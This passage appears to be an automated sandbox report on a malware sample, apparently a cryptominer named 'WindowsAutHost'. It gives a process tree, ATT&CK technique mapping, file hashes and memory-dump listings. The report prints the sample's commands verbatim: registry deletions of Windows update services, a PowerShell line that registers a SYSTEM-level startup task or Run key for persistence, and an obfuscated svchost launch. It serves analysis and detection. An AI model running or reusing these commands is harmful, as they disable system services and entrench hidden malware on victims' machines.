- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:2596
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:2184
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe hjolqijonbv
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  PID:4796
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:4816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Modifies data under HKEY_USERS
    PID:3588
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:3100
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe wyihdkatftbhpcuv 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
  2⤵
  PID:4672

C:\Program Files\WindowsServices\WindowsAutHost
"C:\Program Files\WindowsServices\WindowsAutHost"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:996
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5072
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:428
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:3828
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:3108
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:3400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yxmejq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4688

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Libs\g.log

Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Program Files\WindowsServices\WindowsAutHost

Filesize
9.4MB

MD5
9be61ff460b822df2c3968c6511017b5

SHA1
14bd79daf9ebaed0aed625b956f23e21a40c111a

SHA256
1519b935a98cfba1ac0ab5dcc06efcadff202fd8577be0e2c6e1e92516751950

SHA512
a625effcf35244997bdd8606b19e30e7172783b54c4a06387b25120a85b394914ae162a8e120950342e886abf7ecd6e7319728acaeea919b7570b9caf408f1dd

Download Submit
C:\Program Files\WindowsServices\WindowsAutHost

Filesize
9.4MB

MD5
9be61ff460b822df2c3968c6511017b5

SHA1
14bd79daf9ebaed0aed625b956f23e21a40c111a

SHA256
1519b935a98cfba1ac0ab5dcc06efcadff202fd8577be0e2c6e1e92516751950

SHA512
a625effcf35244997bdd8606b19e30e7172783b54c4a06387b25120a85b394914ae162a8e120950342e886abf7ecd6e7319728acaeea919b7570b9caf408f1dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
eac50d91cba22f84e3ed9aef37e0e3ef

SHA1
a809fbdefd0036530dcf0c435b7bf69a7efdcd7c

SHA256
70a04233d4ce3074e219741627624905f4894ca6d7e5849b7243dd4b8649796b

SHA512
655f1f92d0d839321ec2e48c4dedf218df3da1a453827a99ec3078d1cc43354eaa7b57272d8c0e9756ad5a0f6b751027be13c8bd2625ec7334428d0c9bf29450

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9b74ecc4d59b168cde3731e1c2abfbaf

SHA1
80e14961d1d3b8db1d4e5ba9b42d9252b07ff31f

SHA256
fa10db6b5b638bcecb1c7c1334184e1664def4b786b0f345c647025830aefdc2

SHA512
0501624fdd22a05466ed67760b75f95c0d2743bf92323b4bb1439d32675235873ece5ce4cee2c0383d70d9ba517744202c4083bf49359cae0263b9523a917351

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe

Filesize
9.4MB

MD5
9be61ff460b822df2c3968c6511017b5

SHA1
14bd79daf9ebaed0aed625b956f23e21a40c111a

SHA256
1519b935a98cfba1ac0ab5dcc06efcadff202fd8577be0e2c6e1e92516751950

SHA512
a625effcf35244997bdd8606b19e30e7172783b54c4a06387b25120a85b394914ae162a8e120950342e886abf7ecd6e7319728acaeea919b7570b9caf408f1dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe

Filesize
9.4MB

MD5
9be61ff460b822df2c3968c6511017b5

SHA1
14bd79daf9ebaed0aed625b956f23e21a40c111a

SHA256
1519b935a98cfba1ac0ab5dcc06efcadff202fd8577be0e2c6e1e92516751950

SHA512
a625effcf35244997bdd8606b19e30e7172783b54c4a06387b25120a85b394914ae162a8e120950342e886abf7ecd6e7319728acaeea919b7570b9caf408f1dd

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
811d351aabd7b708fef7683cf5e29e15

SHA1
06fd89e5a575f45d411cf4b3a2d277e642e73dbb

SHA256
0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

SHA512
702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
302a7c179ef577c237c5418fb770fd27

SHA1
343ef00d1357a8d2ff6e1143541a8a29435ed30c

SHA256
9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

SHA512
f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

Download Submit
memory/996-426-0x00007FF6AD5D0000-0x00007FF6AE652000-memory.dmp

Filesize
16.5MB

Download
memory/996-850-0x00007FF6AD5D0000-0x00007FF6AE652000-memory.dmp

Filesize
16.5MB

Download
memory/2824-177-0x00000000043A0000-0x0000000004942000-memory.dmp

Filesize
5.6MB

Download
memory/2824-183-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-151-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-152-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-153-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-154-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-150-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-155-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-156-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-157-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-158-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-159-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-160-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-161-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-162-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-163-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-164-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-165-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-166-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-167-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-168-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-169-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-170-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-171-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-172-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-173-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-174-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-175-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-176-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-141-0x0000000001900000-0x0000000001E75000-memory.dmp

Filesize
5.5MB

Download
memory/2824-178-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-179-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-180-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-181-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-182-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-149-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-184-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-185-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-247-0x00000000043A0000-0x0000000004942000-memory.dmp

Filesize
5.6MB

Download
memory/2824-143-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-144-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-145-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-319-0x00000000043A0000-0x0000000004942000-memory.dmp

Filesize
5.6MB

Download
memory/2824-146-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-147-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2824-148-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/2912-441-0x000002127BB40000-0x000002127BB5C000-memory.dmp

Filesize
112KB

Download
memory/2912-447-0x000002127C2C0000-0x000002127C379000-memory.dmp

Filesize
740KB

Download
memory/2912-480-0x000002127BB60000-0x000002127BB6A000-memory.dmp

Filesize
40KB

Download
memory/4672-859-0x000001EC3D080000-0x000001EC3D0A0000-memory.dmp

Filesize
128KB

Download
memory/4672-858-0x000001EC3D060000-0x000001EC3D080000-memory.dmp

Filesize
128KB

Download
memory/4672-857-0x000001EC3D060000-0x000001EC3D080000-memory.dmp

Filesize
128KB

Download
memory/4672-853-0x00007FF75D470000-0x00007FF75DC64000-memory.dmp

Filesize
8.0MB

Download
memory/4672-860-0x000001EC3D060000-0x000001EC3D080000-memory.dmp

Filesize
128KB

Download
memory/4672-856-0x000001EC3D060000-0x000001EC3D080000-memory.dmp

Filesize
128KB

Download
memory/4672-855-0x00007FF75D470000-0x00007FF75DC64000-memory.dmp

Filesize
8.0MB

Download
memory/4672-861-0x000001EC3D080000-0x000001EC3D0A0000-memory.dmp

Filesize
128KB

Download
memory/4672-854-0x000001EC3CFE0000-0x000001EC3D020000-memory.dmp

Filesize
256KB

Download
memory/4680-331-0x000002AC6A790000-0x000002AC6A806000-memory.dmp

Filesize
472KB

Download
memory/4680-336-0x000002AC6A310000-0x000002AC6A35A000-memory.dmp

Filesize
296KB

Download
memory/4680-357-0x000002AC6A370000-0x000002AC6A38E000-memory.dmp

Filesize
120KB

Download
memory/4680-328-0x000002AC6A680000-0x000002AC6A784000-memory.dmp

Filesize
1.0MB

Download
memory/4680-325-0x000002AC6A3B0000-0x000002AC6A436000-memory.dmp

Filesize
536KB

Download
memory/4680-327-0x000002AC6A540000-0x000002AC6A562000-memory.dmp

Filesize
136KB

Download
memory/4680-326-0x000002AC51D70000-0x000002AC51D80000-memory.dmp

Filesize
64KB

Download
memory/4688-812-0x0000022DFA580000-0x0000022DFA59C000-memory.dmp

Filesize
112KB

Download
memory/4748-407-0x00007FF689A30000-0x00007FF68AAB2000-memory.dmp

Filesize
16.5MB

Download
memory/4748-320-0x00007FF689A30000-0x00007FF68AAB2000-memory.dmp

Filesize
16.5MB

Download
memory/4944-123-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-128-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-134-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-132-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-122-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-135-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-136-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-125-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-133-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-126-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-127-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-124-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-121-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-139-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-129-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-140-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-120-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-130-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-131-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-137-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download
memory/4944-138-0x00000000779B0000-0x0000000077B3E000-memory.dmp

Filesize
1.6MB

Download